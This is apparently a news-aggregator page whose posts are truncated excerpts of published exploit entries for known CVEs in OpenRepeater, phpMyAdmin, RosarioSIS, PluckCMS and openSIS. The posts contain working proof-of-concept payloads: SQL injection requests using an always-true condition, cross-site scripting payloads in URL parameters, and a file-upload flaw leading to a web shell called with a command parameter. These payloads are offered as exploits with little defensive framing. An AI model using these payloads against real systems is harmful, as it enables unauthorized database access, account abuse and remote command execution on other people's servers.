December 3, 2025
Headlines

Latest posts

All
fashion
lifestyle
sports
tech

Trending News

Popular

Hacking
OpenRepeater 2.1 – OS Command Injection
Hacking
phpMyAdmin 5.0.0 – SQL Injection
Hacking
RosarioSIS 6.7.2 – Cross Site Scripting (XSS)
Health
Warning over cosmetic face fillers as scans reveal new details of risks

Latest posts

OpenRepeater 2.1 – OS Command Injection

Author01 mins

# Exploit Title: OpenRepeater 2.1 – OS Command Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OpenRepeater/openrepeater # Software Link: https://github.com/OpenRepeater/openrepeater # Version: 2.1 # Tested on: Ubuntu # CVE : CVE-2019-25024 Proof Of Concept # PoC for OS Command Injection in OpenRepeater before version 2.2 #…

Read More

phpMyAdmin 5.0.0 – SQL Injection

Author01 mins

# Exploit Title: phpMyAdmin 5.0.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/ # Software Link: https://github.com/phpmyadmin/phpmyadmin/ # Version: 5.0.0 # Tested on: Windows # CVE : CVE-2020-5504 Proof Of Concept GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20–%20 HTTP/1.1 Host: phpmyadmin Connection: close # Additional conditions: # – The attacker…

Read More

RosarioSIS 6.7.2 – Cross Site Scripting (XSS)

Author01 mins

# Exploit Title: RosarioSIS 6.7.2 – Cross Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 6.7.2 # Tested on: Windows # CVE : CVE-2020-15716 Proof Of Concept http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22 **Conditions**: 1. User must be authenticated (as shown by the session…

Read More

PluckCMS 4.7.10 – Unrestricted File Upload

Author01 mins

# Exploit Title: PluckCMS 4.7.10 – Unrestricted File Upload # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/pluck-cms/pluck/ # Software Link: https://github.com/pluck-cms/pluck/ # Version: 4.7.10 # Tested on: Windows # CVE : CVE-2020-20969 Proof Of Concept GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1 Host: pluck Cookie: PHPSESSID=[valid_session_id] **Access Method:** http://pluck/files/exploit_copy.php?cmd=id **Additional…

Read More

RosarioSIS 6.7.2 – Cross-Site Scripting (XSS)

Author01 mins

# Exploit Title: RosarioSIS 6.7.2 – Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 6.7.2 # Tested on: Windows # CVE : CVE-2020-15718 Proof Of Concept http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=” onmouseover=”alert(1)” Steps to Reproduce Log in as an admin user. Send the request. …

Read More

openSIS Community Edition 8.0 – SQL Injection

Author01 mins

# Exploit Title: openSIS Community Edition 8.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OS4ED/openSIS-Classic # Software Link: https://github.com/OS4ED/openSIS-Classic # Version: 8.0 # Tested on: Windows # CVE : CVE-2021-40617 Proof Of Concept GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1 Host: opensis Connection: close Steps to…

Read More

You May Have Missed